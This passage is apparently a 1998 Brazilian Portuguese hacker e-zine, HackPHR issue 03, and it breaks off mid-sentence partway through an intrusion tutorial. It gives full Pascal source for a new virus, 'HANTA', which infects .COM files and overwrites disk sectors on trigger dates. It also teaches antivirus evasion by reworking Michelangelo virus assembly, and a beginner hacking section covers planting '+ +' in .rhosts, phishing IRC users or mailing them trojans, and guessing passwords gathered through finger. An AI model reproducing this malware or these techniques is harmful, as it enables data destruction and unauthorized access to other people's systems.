////     ////     ////////      ////////   ////     ////
         ////     ////   ////    ////  ////         ////    ////
        ////     ////   ////    ////  ////         ////  ////
       ////     ////   ////    ////  ////         //// ////
      /////////////   ////////////  ////         ////////
     ////     ////   ////    ////  ////         ////  ////
    ////     ////   ////    ////  ////         ////    ////
   ////     ////   ////    ////  ////         ////      ////
  ////     ////   ////    ////     ////////  ////        ////

                                                 
   [ Numero: 03, Fevereiro de 1998 ]                     
                                                         
       [ Hack and Phreak Group ]                
                                                            
   [ http://www.hackphr.home.ml.org ]                       
                                                            

                                             
                                                         ASCii by MaNdRaCk

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
     VERSAO APENAS PARA MS-DOS. RECOMENDADO CARREGAR O DRiVER COUNTRY.SYS
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



MeMbrOs AtUAiS:         (listados por ordem de ingresso no zine)

- MaNdRaCk      -   mandrack@geocities.com
- Cebola        -   cebola_br@hotmail.com
- ShK           -   shk_hack_@hotmail.com
- HaCk-MaN      -   hack.man@mailcity.com
- SideW         -   


PaRTiCiPAAO EsPeCiAL De:

- GhOsT InVaDeR - UHF ZINE - http://uhf.base.org
ghostin@freemail.globalsite.com.br


OBS.: Editores temporarios, candidatos e contribuidores tmb sao listados...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

     ***   ****   ***   ******     *******  ***   ***
    ***   *** *  ***   ***   ***  ***        *** ***
   ***   ***  * ***   ***   ***  ******       ***
  ***   ***   ****   ***   ***  ***        *** ***
 ***   ***    ***   *******    *********  ***   ***
 ====================== = = = = =  =  =  =   =   =   =    =    =     =      


01| INTRODUAO                          -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -   
02| ViRii                               -  by Cebola
------------------------------------------- - -  -  -   -    -     -   
03| INTRODUAO AO HACKING - PARTE II    -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -   
04| BACKDOORS                           -  by ShK
------------------------------------------- - -  -  -   -    -     -   
05| COMPLEMENTANDO OS NUMEROS BINARIOS  -  by HaCk-MaN
------------------------------------------- - -  -  -   -    -     -   
06| BACKDOOR SH                         -  by GhOsT InVaDeR
------------------------------------------- - -  -  -   -    -     -   
07| PLACAS DE CIRCUITO IMPRESSO         -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -   
08| BOX - TRANSMISSOR FM OCULTO         -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -   
09| SHADOW PASSWD                       -  by SideW
------------------------------------------- - -  -  -   -    -     -   
10| CORREIO DA GALERA                   -  by HackPHR
------------------------------------------- - -  -  -   -    -     -   
11| ANUNCIOS, PUBLICAOES & MISC.       -  by HackPHR
------------------------------------------- - -  -  -   -    -     -   
12| ENTRANDO EM CONTATO                 -  by HackPHR
------------------------------------------- - -  -  -   -    -     -   
13| BRINDE: EXPLOIT P/ NETSCAPE E IE    -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -   



   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                             01  -  INTRODUAO
                            -=-=-=-=-=-=-=-=-=- 


   Ai pessoal, estou abrindo aki a ediao de Fevereiro, a primeira de 98, com
todo o pique, o zine nao podia estar melhor, e agradeo a todos os leitores,
o sucesso do zine nos devemos a vcz... O numero de editores aumentando, dah
pra fazer o zine sempre grandaiao, hehehe... Bom, voltando a falar sobre edi-
tores, eu peo q nao mandem mais mails se candidatando, falem diretamente com
um de nossos editores, todo fim de semana, geralmente a tarde no nosso querido
canal de mIRC. Fica bem melhor pra gente, nao precisa ficar com medo, se vc
acha q tem chance e tem medo q a gente acha q vc sabe pouco, nao vamos fazer
nada de mal, como vovo jah dizia: quem nao arrisca nao petisca... hehehe...
   Ah, nosso Home Page tambem mudou de URL e de cara, agora eh soh digitar
http://www.hackphr.home.ml.org, pronto, lah soh vai ter o nosso zine e mais
uns progz q a gente fez, outros zines mais tarde, a pagina de outros zines
ainda tah em construao, ainda a proxima ediao, vcz podem contar nos dedos,
01 de Maro, vamos lutar o maximo pro zine ser mensal, pois nao podemos dar
bobeira pro nosso zine nao cair de circulaao. Pois hoje em dia tem uma porra-
da e meia de zines, em tudo q eh lugar, pena q a maioria eh "xerox" dos outros
e puxa-saco da Axur, como se adiantasse muito...

   Hamm, nesse zine vcz vao encontrar algumas materias interessantes, tmb po-
dem notar q temos a participaao de nosso amigo Ghostin da UHF, ele escreveu
uma materia sobre Backdoors. Temos ainda a participaao do ShK e do HaCk-MaN,
eles apenas escreveram uma materia pequena cada um, tmb nao conseguimos falar
com eles ultimamente, nao estamos recebendo reply...
   Esta ediao jah comea arrebentando com uma materia muito massa do Cebola,
com o source de um virus novo feito por ele mesmo, logo apos temos a continua-
ao da minha materia sobre hacking para iniciantes. Pro final ainda temos uma
materia minha sobre uma box e um guia para soldagem e confecao de placas de
cicuito impresso, eu queria colocar mais coisas, principalmente de uns caras
que escreveram pra gente, mas jah tava chegando o dia 01 de Fevereiro e eu
nao queria atrasar... Soh deu pra colocar uma materia pequena q o SideW fez.
Espero q gostem, e preparem o folego pra 04...



   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                                02  -   ViRii
                               -=-=-=-=-=-=-=- 

        A, galera. Ano novo, revista nova, virus novo. Enquanto muita gente
tava a coando o saco, eu tava aqui ralando, estudando muito(hacking, 
claro) e desenvolvendo um novo virus para essa edio do zine. Vai a um
resumo das matrias virii:

        * Continuao do tutorial de variantes de virus
        * Virus completo com caractersticas Stealth feito em Pascal

        O algortimo para gerao de nmeros de cartes de crdito eu fico
devendo para a prxima edio, j que a parte virii dessa edio deu quase
700 linhas.

	
Tutorial de como escrever variantes(parte II)
---------------------------------------------

        Na ltima edio do zine eu dei o source do Michelangelo, que vai ser
muito til nesse tutorial sobre variantes. Sei que mais algum j deve ter es-
crito sobre isso, inclusive encontrei uma matria em um zine americano, mas
tava meio confuso, ento eu resolvi escrever a minha matria, que deve estar
bem fcil de se entender, inclusive para os beginners. Voc vai precisar de
pelo menos algum pequeno conhecimento em Assembler para isso.
        Como j temos o source do virus fica muito mais fcil. A primeira
coisa a se fazer  salvar o source em um arquivo e compilar com qualquer
compilador ASSEMBLER. Eu uso o A86, na minha opinio  o melhor porque 
shareware e suporta todos os formatos de linguagem Assembly. Aps compilar o
source, voc vai perceber que qualquer antivirus merdinha  capaz de acusar a
presena do Michelangelo no arquivo. Eu usei a ltima atualizao do Viruscan
para esses testes, se voc for usar outro antivirus talvez os resultados sejam
um pouco diferentes.
        O primeiro passo  dividir o source em pequenos pedaos, que alis
j esto divididos, como: Int13h, Check_infection, Infect_it, etc... Esses
so os labels usados no virus, e so bastante teis para se organizar o
programa em blocos. A finalidade de dividir o source nesses labels  de
descobrir onde est a assinatura do virus.  Ou seja, atravs de que parte
do source do virus compilado que o antivirus identifica o virus. O que ns
vamos fazer  achar a assinatura do virus e mudar os comandos, afim de
modificar o source mas no alterar o efeito do virus.
        Se voc tem algum conhecimento em ASM, deve saber que voc pode mudar
a ordem dos atributos dados aos registros sem qualquer dano ao source, desde
que a chamada da interrupo fique por ltimo. Assim,

        MOV AH, 16
        MOV BX, 123
        INT 21

         igual a

        MOV BX, 123
        MOV AH, 16
        INT 21

       Lembre-se que eu acabei de inventar esse exemplo, e no tenho a mnima
idia do que isso vai fazer depois de compilado. Outra regra: evidentemente
quando voc copia o valor de uma varivel dentro de outra a ordem deve ser res
peitada. EX:

        MOV AH, 16
        MOV DH, AH
        INT 23

         diferente de

        MOV DH, AH
        MOV AH, 16
        INT 23

       No primeiro exemplo estariamos assignando o valor 16 ao registrador AH
e depois assigna o valor AH ao registrador DH. Ento ficaria: AH=DH=16. Ele
 diferente do segundo exemplo porque o segundo exemplo faria o seguinte:
d o valor AH ao registrador DH, ficariam AH=DH=0. Depois d ao registrador AH
o valor 16. No final ento s o registrador AH estaria com valor=16. Se voc
no entendeu, vai aprender assembly e depois vem ler essa matria.
        Bom, voltando ao que interessa, o primeiro passo  comear a retirar
partes do cdigo do virus e compilar o cdigo sem esses pedaos. Se o antivirus
ainda acusa o virus, voc ainda no chegou na sua assinatura. Por exemplo:
voc retira do cdigo do Michelangelo dado na ltima edio o label INT13H.
Voc compila o cdigo obtido e o antivirus no acusa a presena de virus. Isso
quer dizer que o pedao do virus que o identifica para o antivirus(a
assinatura do virus) ficou no pedao que voc retirou. Ento, a assinatura do
virus est no label INT13H. Bom,  s uma suposio.
        Outro cuidado a ser tomado  quanto  referencia feita no programa aos
labels. Por exemplo, se voc vai retirar um label chamado "teste" e no resto
do virus h uma linha que diz

        JNE TESTE

        na hora de compilar o compilador vai gerar um erro. A soluo 
simplesmente colocar um ponto e vrgula antes da linha, declarando essa
linha como um comentrio. Ficaria assim:

        ; JNE TESTE

         s um modo de se evitar o erro. Depois deve-se retirar os pontos-e-
vrgulas para no mudar o cdigo viral.
        Ento depois dessa teoria toda vamos  pratica: Comece retirando
pedaos do virus. Na maioria dos casos a assinatura fica no incio do virus.
Ento comece retirando a segunda metade do virus. Eu comecei apagando tudo o
que vem depois do label entervirus. Compilei e executei o scan: o virus con-
tinuava detectvel. Comecei agora retirando pedaos do incio. Retirei o pri-
meiro label, o antivirus continuava detectando. Retirei o segundo, tambm.
Continuei assim at s restar o label entervirus. Ento uma coisa interessante
aconteceu: o antivirus passou a reconhecer o arquivo como sendo infectado pelo
virus GENB!!! Chegamos  concluso que o GENB  quase uma variante do
Michelangelo. Eu consegui isolar a parte do Michelangelo que o identifica como
GENB, ento achei a assinatura do GENB. A assinatura do GENB fica entre esse
pedao de cdigo:

************************* GENB *************************

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
                org     0

highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h


entervirus:
                xor     ax,ax
                mov     ds,ax
                cli
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                sti
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
                mov     dx,80h                  ; Read old partition table of
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end

*****************************************

         Bom lembrar que no temos  mo o virus GENB. Se voc compilar
esse source e rodar no computador voc no vai estar executando o virus
GENB, mas somente um pedao dele que contm a sua assinatura.
        Bom, voltamos ento ao Michelangelo. Eu tinha acabado de retirar o
label IS360KDISK e nosso virus ficou indetectvel(passou a detectar o GENB no
lugar). Ento recoloque o label is360Kdisk no lugar. Conseguimos isolar agora
um pedao de pequeno tamanho do virus que contm a assinatura. No temos em
mo necessariamente a assinatura, mas um pedao que a contm. Eis esse pedao:

********** ASSINATURA *************

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
                org     0

                jmp     entervirus
highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h


is360Kdisk:
                mov     firstsector,cx
                pushf
                call    oldint13h
;                 jc      quitinfect              ; exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ; Copy partition table
                cld
                rep     movsw
                mov     ax,301h                 ; Write virus to sector 1
                xor     bx,bx
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h

entervirus:
                xor     ax,ax
                mov     ds,ax
                cli
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                sti
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
;                 mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
;                 mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                int     13h                     ; reset disk
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
;                jne     floppyboot              ; if not, do floppies
                mov     dx,80h                  ; Read old partition table of
                int     13h                     ; first hard disk to 0:7C00h
;                 jmp     short exitvirus
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end

*********** ASSINATURA **********

        As linhas que tm um ponto-e-vrgula antes faziam referncia a um
label que foi retirado do cdigo. Depois de construir a sua variantes, voc
deve retirar esses pontos e vrgulas.
        Bom, agora que voc tem o pedao de cdigo que contm a assinatura do
virus voc deve modificar esse pedao de cdigo  vontade, mas nunca retirando
nada at obter um cdigo que no seja reconhecido pelo antivirus. Um exemplo
 mudando as linhas que dizem:

        MOV ax,201h
        MOV bx,7CH00

        para

        MOV bx,7CH00
        MOV ax,201h

        Cuidado para no cometer nenhum dos erros que listei acima e sempre
deixar a chamada  interrupo por ltimo. Se voc conseguir um cdigo que
se torne invisvel para o antivirus, copie esse pedao de cdigo para dentro
do virus original(que foi dado na edio 02 desse zine), substituindo o
antigo, ou seja, apague os labels IS360KDISK e ENTERVIRUS do virus original
e os substitua com os que voc modificou e no foram achados pelo antivirus.
Compile e passe o antivirus agora pela variante que voc gerou. Se o antivirus
no o detectar, se alegre: voc criou uma das trocentas variantes do
Michelangelo. Se voc conseguiu, salve o cdigo fonte(.ASM) em um arquivo e
me mande. Eu terei prazer em colocar o seu nome aqui na prxima edio da
revista! Mensagens para:  cebola_br@hotmail.com


Virus com caractersticas Stealth feito em Pascal
-------------------------------------------------

        Eu andei pesquisando muitos virus nessas frias, e acabei produzindo
um que, na minha opinio, superou todos os outros que eu j tinha visto feitos
em pascal. A vantagem de se usar linguagens de alto nvel  que so menos pro-
pcias a erro, permitem um controle sobre o fluxo do programa(se voc usar um
bom editor como o Turbo Pascal) e o cdigo fica bem menor. Mas quando se trata
de vrus(e no cavalo de tria)  sempre bom usar linguagens compiladas e no
interpretadas. Linguagens compiladas so: Pascal, C, C++, Delphi... Linguagens
interpretadas so: Basic, Qbasic, Vbasic, Java... A desvantagens das interpre-
tadas  que so muito lentas, e no caso de virus(que normalmente devem execu-
tar sua rotina de infeco sem o usurio perceber) isso  necessariamente
muito importante.
        O cdigo dado a seguir vem com os comentrios em formato Pascal-padro
(usando chaves) e no  necessrio a retirada destes para a compilao do pro-
grama. Diferente de que muita gente acha, os comentrios no aumentam o tama-
nho do programa compilado, e so muito teis para terceiros entenderem o c-
digo.

================== Virus HANTA verso 1.0 ========================
Program Virus_HANTA;

{VIRUS HANTA VERSO 1.0 BY CEBOLA
 DATA DE CRIAO: 22/01/1998
 BELO HORIZONTE, MG
"NO VOU FICAR IMPLORANDO PRA NO ALTERAREM O CDIGO
 MAS TENHA EM MENTE QUE, SE VOC ALTERAR  UM LAMMER
 SEM CRIATIVIDADE!!!"

 BUGS E CORREES PARA: cebola_br@hotmail.com}


{diretiva M define o tamanho da pilha dinamica para liberar mais memoria e
eliminar o bug DosError 8(out of memory) na linha que chama o programa
original}
{$M 16384,0,0}
{$Q-}
{$R-}


Uses Windos,dos,crt;
var curdir: string;
    dir: SearchRec;
    x: integer;
    attrib: byte;

procedure age;
var dia,dia_semana,mes,ano: word;
    regs: Registers;
begin
  getdate(ano,mes,dia,dia_semana);
  {O VIRUS AGE NOS DIAS 11/12 E NAS SEXTAS-FEIRAS DIA TREZE}
  if ((dia=12) and (mes=11)) or ((dia=13) and (dia_semana=5)) then
   begin
     clrscr;
     for x:=1 to 12 do
      begin
       textcolor(x);
       gotoxy(x,5);
       writeln('                  _________-----_____');
       gotoxy(x,6);
       writeln('       _____------           __      ----_');
       gotoxy(x,7);
       writeln('___----             ___------              \');
       gotoxy(x,8);
       writeln('   ----________        ----                 \');
       gotoxy(x,9);
       writeln('               -----__    |             _____)');
       gotoxy(x,10);
       writeln('                    __-                /     \');
       gotoxy(x,11);
       writeln('        _______-----    ___--          \    /)\');
       gotoxy(x,12);
       writeln('  ------_______      ---____            \__/  /');
       gotoxy(x,13);
       writeln('               -----__    \ --    _          /\');
       gotoxy(x,14);
       writeln('                      --__--__     \_____/   \_/\');
       gotoxy(x,15);
       writeln('                              ----|   /          |');
       gotoxy(x,16);
       writeln('                                  |  |___________|');
       gotoxy(x,17);
       writeln('                                  |  | ((_(_)| )_)');
       gotoxy(x,18);
       writeln('                                  |  \_((_(_)|/(_)');
       gotoxy(x,19);
       writeln('                                  \             (');
       gotoxy(x,20);
       writeln('                                   \_____________)');
       delay(500);
      end;
     delay(10000);
     clrscr;
     gotoxy(1,5);
     writeln('                              ');
     gotoxy(1,6);
     writeln('                                       ');
     gotoxy(1,7);
     writeln('                                ');
     gotoxy(1,8);
     writeln('                                            ');
     gotoxy(1,9);
     writeln('۱                ۱     ۱          ');
     gotoxy(1,10);
     writeln('                                       ');
     gotoxy(2,11);
     writeln('                                           ');
     gotoxy(2,12);
     writeln('                                              ');
     gotoxy(3,13);
     writeln('                                                   ');
     gotoxy(5,14);
     writeln('                                                            ');
     gotoxy(6,15);
     writeln('                                                               ');
     delay(10000);
     {regrava todas as trilhas do disco rgido}
     Regs.ah:=$19;
     intr($21,regs);
     Regs.cx:=$0009;
     Regs.dx:=$0;
     intr($26,regs);
   end;
end;
function save_old_attrib(arquivo:string): byte;
{Salva os atributos do arquivo a ser executado para depois de infectado
voltar com os atributos antigos}
var attr: word;
    arq: file;
begin
  assign(arq,arquivo);
  GetFAttr(arq,attr);
  save_old_attrib:=attr;
end;
procedure put_old_attrib(arquivo:string; attrib:word);
{resgata os atributos antigos do arquivo j infectado e os recoloca no
arquivo}
var arq: file;
begin
  assign(arq,arquivo);
  SetFAttr(arq,attrib);
end;

function check_infection(nome : string): boolean;
{CHECA SE O ARQUIVO A SER INFECTADO J EST INFECTADO}
var arq,temp: text;
    i: integer;
    a,b,c,d: char;
begin
{***}
{acha o arquivo atual, contendo o cdigo do virus}

     assign(arq,nome);
     reset(arq);
     assign(temp,'temp.dat');
     rewrite(temp);
     for i:=1 to 13 do read(arq,a);
     read(arq,a);
     write(temp,ord(a));
     write(temp,' ');
     for i:=1 to 22 do read(arq,b);
     read(arq,b);
     write(temp,ord(b));
     write(temp,' ');
     for i:=1 to 60 do read(arq,c);
     read(arq,c);
     write(temp,ord(c));
     write(temp,' ');
     for i:=1 to 77 do read(arq,d);
     read(arq,d);
     write(temp,ord(d));
     if (a=chr(4)) and (b=chr(141)) and (c=chr(7)) and (d=chr(0)) then
     begin
       check_infection:=true;
       close(arq);
       close(temp);
     end
     else begin
            check_infection:=false;
            close(arq);
            close(temp);
          end;

{***}
end;

procedure infect_directory;
var infile, outfile: file;
    curdir,vitima,virus: string;
    arquivo, arquivo2: SearchRec;
    size,actlen,curlen: longint;
    result: word;
    buffer: array[1..1000] of char;
    buffer2: array[1..928] of char;
    virusfile,tempfile: text;
    a,b,c,d: char;
    sign: char;
    i: integer;
    infected: boolean;

const all:byte=$3F;


begin
  {retorna o diretorio atual}
  getdir(0,curdir);
  {procura o 1 arquivo COM para infectar}
  findfirst(curdir+'\'+'*.com',all,arquivo);
  while doserror=0 do
  begin
   clrscr;
   {garante que  um arquivo(attr=32) e no um diretrio(attr=16)}
   if (arquivo.attr=32) and (arquivo.name<>'TEMP.COM') then
   begin
     {verifica se j no est infectado}
     infected:=check_infection(arquivo.name);
     if infected=false then
     begin
      {guarda na varivel vitima o arquivo a ser infectado}
      vitima:=arquivo.name;
      {salva os atributos antigos}
      attrib:=save_old_attrib(arquivo.name);
      {guarda na variavel virus o nome do arquivo contendo o cdigo viral}
      virus:=paramstr(0);
      {copia o virus pro arquivo}
      assign(infile,virus);
      assign(outfile,'temp.com');
      reset(infile,1);
      rewrite(outfile,1);
      for i:=1 to 12 do
       begin
         blockread(infile, buffer, 1000, result);
         blockwrite(outfile, buffer, 1000, result);
       end;
      blockread(infile, buffer2, 864, result);
      blockwrite(outfile, buffer2, 864, result);
      close(infile);
      {copia o original pro final do arquivo}
      assign(infile,vitima);
      {abre o arquivo e define um registro=1byte}
      reset(infile,1);
      {retorna o tamanho do arquivo}
      size:=filesize(infile);
      actlen := 0;    {outputfile}
      curlen := size; {inputfile}
      while actlen < curlen do
       begin
         blockread(infile, buffer, 1000, result);
         if actlen + 1000 > curlen then
          begin
            blockwrite(outfile, buffer, curlen - actlen, result);
            actlen := curlen;
          end
          else
           begin
             blockwrite(outfile,buffer,1000,result);
             inc(actlen,1000);
           end;
       end;
      close(infile);
      close(outfile);
      {DEPOIS DE PRONTO, O ARQUIVO TEMP COM VAI FICAR ASSIM:
       ---------------------------
      |   VIRUS    |   ORIGINAL   |
      |            |              |
       ---------------------------
       ENTO FECHA O ARQUIVO TEMP.COM, DELETA O ARQUIVO ORIGINAL E RENOMEIA
       O TEMP.COM PARA PARA O NOME DO ORIGINAL}
       assign(infile,vitima);
       erase(infile);
       assign(outfile,'TEMP.COM');
       rename(outfile,vitima);
       put_old_attrib(vitima,attrib);
      end;
   end;
   findnext(arquivo);
  end;
end;
procedure exec_original;
{RETIRA O ORIGINAL DO FINAL DO ARQUIVO SENDO EXECUTADO E SALVA EM ARQUIVO
TEMPORRIO PARA DEPOIS EXECUTAR}
var infile: file;
    outfile: file;
    size,actlen,curlen: longint;
    buffer: array[1..1000] of char;
    result: word;
    parametros: string;
    i: integer;

begin

  assign(infile,paramstr(0));
  assign(outfile,'a.com');
  reset(infile,1);
  rewrite(outfile,1);
  seek(infile,12864);
  size:=filesize(infile);
  actlen := 0;    {outputfile}
  curlen := size-12864; {inputfile}
  while actlen < curlen do
   begin
     blockread(infile, buffer, 1000, result);
     if actlen + 1000 > curlen then
      begin
        blockwrite(outfile, buffer, curlen - actlen, result);
        actlen := curlen;
      end
     else
       begin
         blockwrite(outfile,buffer,1000,result);
         inc(actlen,1000);
       end;
   end;
   close(infile);
   close(outfile);
   if paramcount=0 then
    begin
      exec('a.com','');
      chdir(curdir);
    end
    else
    begin
      parametros:=paramstr(1);
      if paramcount>1 then
      begin
        for i:=2 to paramcount do parametros:=parametros+' '+paramstr(i);
      end;
      exec('a.com',parametros);
      chdir(curdir);
    end;

end;
begin
  {LEMBRAR DE TIRAR OS ATTRIBS DE SOMENTE LEITURA SE J EXISTIR UM ARQUIVO NO
  DIRETRIO A SE INFECTAR CHAMADO TEMP.COM}
  getdir(0,curdir);
  infect_directory;
  findfirst('curdir'+'\'+'*.*',$3F,Dir);
  While doserror=0 do
  begin
   if dir.attr=16 then
      infect_directory
      else findnext(dir);
  end;
  exec_original;
  age;
end.

=================== FIM DO CDIGO ===================

        Bom, por essa edio  s. Crticas, sugestes, relatamentos de bugs
nos programas aqui listados:

        cebola_br@hotmail.com

        Se quiser usar PGP:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO
hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc
A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR
tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy
Pg==
=OV6h
-----END PGP PUBLIC KEY BLOCK-----


   1998, Cebola - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                   03  -  INTRODUAO AO HACKING - PARTE II
                  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Agora a continuaao do q eu escrevi na ediao passada, depois de ter publi-
cado, vieram uns caras me dizendo:

   - Meu cara, vc fez uma materia na ed. 02 q dizia q ia ensinar a hackear, 
mas nao ensinou nada sobre como Hackear...

   Meus amigos, hackear nao eh vc ter de cor uns comandos pra copiar o passwd,
nao eh facil, vc tem q ter muito planejamento, muita estrategia, nao eh soh
copiar o q estah escrito naquele zine, q se vc fazer isso vc ganha acesso root
vc deve criar seus metodos, como? Entendendo, exige estudo, sem antes entender
um Sistema Operacional, como vc quer hackea-lo? Quem nao entende o sistema e
consegue fazer algo nele, nao o hackeia, mas sim, LAMMEREIA. Portanto aih vai
a continuaao, e se vc acha q tah fraco, q nao ensina nada, esse zine nao eh
pra vc, pare de ler e apague-o de seu HD...
   Bom, sem enrolaao, vamos lah:


   Usando Rlogin
  -=-=-=-=-=-=-=-

   O Rlogin eh um outro comando para logar em sistemas, se vc nao tiver uma
conta em alguma maquina, existe uma manha do Rlogin, pra vc logar sem ter a
password. O comando tem a seguinte sintaxe:

 rlogin -l username host.com.br

   Para obter maiores informaoes sobre o Rlogin, veja o manual dele:

 $ man rlogin

   O Rlogin funciona da seguinte maneira, vc jah digita o username na linha de
comando e ele jah vai pedir a password, vamos a um exemplo:

 $ rlogin -l mandrack lamer.com.br
   connecting...
   password:
   
   $

   Depois de digitar a password logo cai o shell da maquina q vc logou. Bom,
antes de testar seu Rlogin, verifique se ele tem um arquivo .rhosts no direto-
rio em q ele estah, por exemplo /bin. Note q ha um ponto na frente de rhosts,
is quer dizer q o arquivo eh oculto, entao vc devera dar o comando ls -a:

 $ ls -a

   .rhosts     rlogin

 $

   Beleza ele tah lah, quer dizer q vc agora pode logar sem ter q colocar a
password! Faa o seguinte, edite o arquivo .rhosts, vc vai verificar q lah
existem os usernames e os hosts, embaixo do host q vc pretende atacar, coloque
a seguinte linha:

--corte--
+ +
--corte--

   Saia do editor e grave o arquivo... Soh isso??? Ehh, soh isso mano, agora
eh soh se divertir...


   SE VC NAO TIVER UMA CONTA
  -=-=-=-=-=-=-=-=-=-=-=-=-=-

   Bom, eh logico q para pegar acesso root vc precisa de uma conta, para isso
eu classifico dois metodos, o facil e o dificil.


   METODO FACIL:

   Com o metodo facil, vc precisa ter conversa e um programa de IRC. Vc vai
ter q exigir muito de sua labia em certos casos, outros nem tanto...
   Primeiro entre em qquer servidor de IRC, de preferencia a canais #hacking
#unix, ou qquer outro onde os hackers se encontram, e onde tem hacker tem la-
mer. Fique de olho em varios canais, pra ver se tem um lamer q faz uma pergun-
ta tola, alguem vai falar merda pra ele, ou o mais provavel, ele vai ser chu-
tado do canal, entao fale com ele em PVT, e responda a pergunta dele, va pu-
xando conversa, ate ele ganhar sua confiana, aih ve se vc consegue pegar o
login e a senha dele, de um jeito, como? Invente, sei lah, se ele usa o Win
3.1 pea os arquivos de configuraao dele, invente algo, se ele for mais di-
ficil, consiga o e-mail dele e mande um trojan, como aquele q o Cebola falou
na seao ViRii da ed. 02 do zine. Ateh q vc consiga o login e a senha do tapa-
do...

OBS.: Soh faa isso com lamers


   METODO DIFICIL:

   Esse eh bem mais chato e exige paciencia. Antes ache o host de um servidor
mais novo, q provavelmente usam senhas babacas, ou as mesmas do login, coisa
q nao eh dificil acontecer. entao do seu shell faa o seguinte:

 $ finger @merda.com.br

Login    Name                 Tty   Idle  Login Time   Office     Office Phone
rafa     Rafael Papael         p2   4:46  Jan 27 11:19
sjm      Silvano Jose Medeiros p5     3d  Jan 16 15:35
root     System Administrator  p3   4:59  Jan 16 10:17


OBS: Este eh um finger inventado, se seu nome consta aki eh mera coincidencia!


Entao mais tarde, quando sua vitima cair fora do sistema, tente logar:

Login: rafa

   A password, vc terah q chutar, primeiro comece com o mesmo do login, se
nao der va tentando:

rafael
papael
Papael
rafael98

   Coisas assim, se vc conseguir, alem de vc ter uma conta vc tmb eh um cagao,
pois esse metodo eh phoda pra caralho!!!


   PEGANDO ROOT
  -=-=-=-=-=-=-=-

  Aki vou por soh uma maneira de ser o root, outras fica pra proxima, q eu
